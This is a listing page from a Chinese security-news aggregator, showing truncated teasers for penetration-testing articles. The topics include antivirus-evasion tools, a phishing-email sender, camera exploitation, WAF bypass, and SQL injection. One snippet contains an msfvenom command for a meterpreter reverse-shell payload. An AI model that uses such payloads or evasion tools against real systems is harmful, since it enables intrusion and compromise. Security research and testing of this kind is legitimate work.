unSafe.sh - 不安全
我的收藏
今日热榜
公众号文章
导航
Github CVE
Github Tools
编码/解码
文件传输
Twitter Bot
Telegram Bot
Rss
黑夜模式
【免杀工具】killEscaper过360,火绒检测
点击蓝字,关注我们Github项目:https://github.com/Anyyy111/killEscaper声明:本工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,...
2023-6-9 22:2:34 | 阅读: 39 |
收藏
|
渗透安全团队
shellcode
killescaper
python
免杀
渗透
GUI钓鱼邮件便捷发送 | 工具
工具简介钓鱼邮件便捷发送工具(GUI),本程序利用Python语言编写,使用Tkinter实现图形化界面,可使用Pyinstaller进行exe打包,程序主界面截图如下:功能简介1、支持腾讯企业邮、网...
2023-6-9 22:2:28 | 阅读: 20 |
收藏
|
渗透安全团队
钓鱼
渗透
安全
eml
发件
工具 | 摄像头漏洞渗透和利用总结
批量扫描破解海康威视、大华等摄像头的常见漏洞、弱密码地址:https://github.com/WhaleFell/CameraHack海康威视RCE漏洞 批量检测和利用工具地址:https://gi...
2023-6-8 22:43:37 | 阅读: 59 |
收藏
|
渗透安全团队
渗透
安全
github
漏洞
海康
实战 | 新手任意用户密码修改漏洞
一 前言 学习网络安全已经两个月了,第一次挖洞,技术含量不高,大牛可以跳过,主要分享下思路,希望可以结交更多的小伙伴,有圈内人员可以拉下弟弟进个学习群啥的(圈外人员的梦想) 二 发现过程 此漏洞是我...
2023-6-8 22:43:31 | 阅读: 22 |
收藏
|
渗透安全团队
账号
漏洞
渗透
爆破
申诉
多层代理解决Web测试中遇到的抓包问题
由于微信公众号推送机制改变了,快来星标不再迷路,谢谢大家!背景测试的web项目是外部网站,需要挂socks代理才能访,但是通过burp配置好之其他网站均能正常抓包,唯独项目网站抓不到包问题开始时使用c...
2023-6-7 22:56:2 | 阅读: 41 |
收藏
|
渗透安全团队
代理
proxy
burp
clashx
渗透
渗透扫描APP漏洞的平台 | 工具
由于微信公众号推送机制改变了,快来星标不再迷路,谢谢大家!第一次接触MobSF,还是在实习工作中,来了个APP渗透的活,那时候还不太了解,领导说,直接拿MobSF扫描一下不就好了,后来一用就变成了常用...
2023-6-7 22:55:57 | 阅读: 25 |
收藏
|
渗透安全团队
mobsf
渗透
security
安全
Bypass360 | 工具(近期更新)
0x01 工具介绍绕过360工具。0x02 安装与使用1、生成shellcode:msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.1...
2023-6-6 22:42:23 | 阅读: 46 |
收藏
|
渗透安全团队
渗透
shellcode
安全
绕过
hpp0x03
【干货】渗透过程中为什么我们需要收集URL?
Next Generation HTTP Dir/File Fuzz Tool: https://github.com/chainreactors/sprayFast passive URL enum...
2023-6-6 22:42:17 | 阅读: 39 |
收藏
|
渗透安全团队
爆破
github
自动化
信息
php
【干货】绕过WAF的常用5种方法
WAF是一种用于过滤和阻止恶意网络流量的网络安全解决方案。国外网站常见的供应商包括CloudFlare、AWS、Citrix、Akamai、Radware、Microsoft Azure和Barrac...
2023-6-5 20:21:55 | 阅读: 23 |
收藏
|
渗透安全团队
防火墙
payload
绕过
网络
nmap
【工具 】提取Windows主机部分日志和cmdkey | SharpWinLog
鸣谢:@uknowsec师傅。本工具由@uknowsec师傅的SharpEventLog修改而来,不足之处欢迎师傅们指点和纠正,感激不尽。介绍原来的的项目旨在提取中文语言的Windows系统中与登录失...
2023-6-5 20:21:51 | 阅读: 20 |
收藏
|
渗透安全团队
sharpwinlog
渗透
信息
windows
安全
【漏洞】NPS代理反制绕过登陆验证复现
由于微信公众号推送机制改变了,快来星标不再迷路,谢谢大家!NPS- 一款轻量级、高性能、功能强大的内网穿透代理服务器1.前言看了师傅的一个文章,感觉挺有意思的,尝试记录下来,结尾有"惊吓"GitHub...
2023-6-4 21:7:50 | 阅读: 596 |
收藏
|
渗透安全团队
nps
绕过
加密
crypt
Dubbo 3.x命令执行利用工具(CVE-2023-23638)
由于微信公众号推送机制改变了,快来星标不再迷路,谢谢大家!工具说明本工具支持CVE-2023-23638在Dubbo 3.x的完整利用,覆盖服务发现到漏洞利用及回显。在Dubbo 2.x版本也可以利用...
2023-6-4 21:7:45 | 阅读: 26 |
收藏
|
渗透安全团队
漏洞
渗透
安全
谢谢
dubbo
靶场实操-从joomla到拿下域控
访问网站主页,是一个博客网站常规的目录扫描这里发现一个疑似后台地址,访问http://192.168.2.252/administrator/为 joomla 站点,印象中记得有rce的漏洞,上网寻找...
2023-6-3 00:1:43 | 阅读: 17 |
收藏
|
渗透安全团队
lsa
security
渗透
dirty
1472
工具 | 通达OA漏洞检测
由于微信公众号推送机制改变了,快来星标不再迷路,谢谢大家!0x01 工具介绍通达OA漏洞检测工具-TongdaScan_go,支持检测: 通达OA v2014 get_contactlist.php...
2023-6-1 22:46:25 | 阅读: 27 |
收藏
|
渗透安全团队
通达
php
v11
漏洞
安全
绕过W*S-WAF的MSSQL注入
由于微信公众号推送机制改变了,快来星标不再迷路,谢谢大家!绕过W*S-WAF的MSSQL注入 目录○ 第一个网站 ◇ 确定列数与显示位 ◇ 查库名 ◇ 查表名 ◇ 查列名...
2023-6-1 22:46:19 | 阅读: 19 |
收藏
|
渗透安全团队
列名
数据
绕过
payload
渗透
实战 | 某新疆职业技术学院逻辑漏洞
免责声明由于传播、利用本公众号狐狸说安全所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号狐狸说安全及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会...
2023-5-31 22:44:43 | 阅读: 88 |
收藏
|
渗透安全团队
账号
信息
inurl
安全
【漏洞复现】Nacos存在SQL注入漏洞
简介Nacos 是阿里的开源项目,应用于微服务,微服务是将单体应用拆分成一个个服务节点,nacos主要功能是服务发现和微服务的配置集中管理。Nacos一、漏洞详情源码地址:https://github...
2023-5-31 22:44:38 | 阅读: 329 |
收藏
|
渗透安全团队
nacos
alibaba
渗透
某X CMS任意文件上传、删除、XSS漏洞挖掘
由于微信公众号推送机制改变了,快来星标不再迷路,谢谢大家!死学没用,劳逸结合,玩累了再学。不经过任何过滤,张口就来,反射XSS<?php if ($_GET['art']): ?><dd><span...
2023-5-31 00:0:39 | 阅读: 20 |
收藏
|
渗透安全团队
tpl
渗透
maxsize
API接口安全测试大全(一键扫描工具)
由于微信公众号推送机制改变了,快来星标不再迷路,谢谢大家!0x00 api接口介绍通常在网站的通讯中,很多会调用api接口去方便更多信息的管理与调用,但是当使用某些api时,在开发人员未对api接口做...
2023-5-31 00:0:35 | 阅读: 123 |
收藏
|
渗透安全团队
swagger
信息
注入
安全
漏洞
漏洞扫描 | Xray图形化 - 更新
由于微信公众号推送机制改变了,快来星标不再迷路,谢谢大家!0x01 工具介绍xray 是一款优秀的漏洞扫描工具,但目前只有命令行版本,通过 config.yaml 配置文件启动,很多情况下不好上手,需...
2023-5-29 20:3:21 | 阅读: 35 |
收藏
|
渗透安全团队
渗透
安全
xray
谢谢
漏洞
Previous
10
11
12
13
14
15
16
17
Next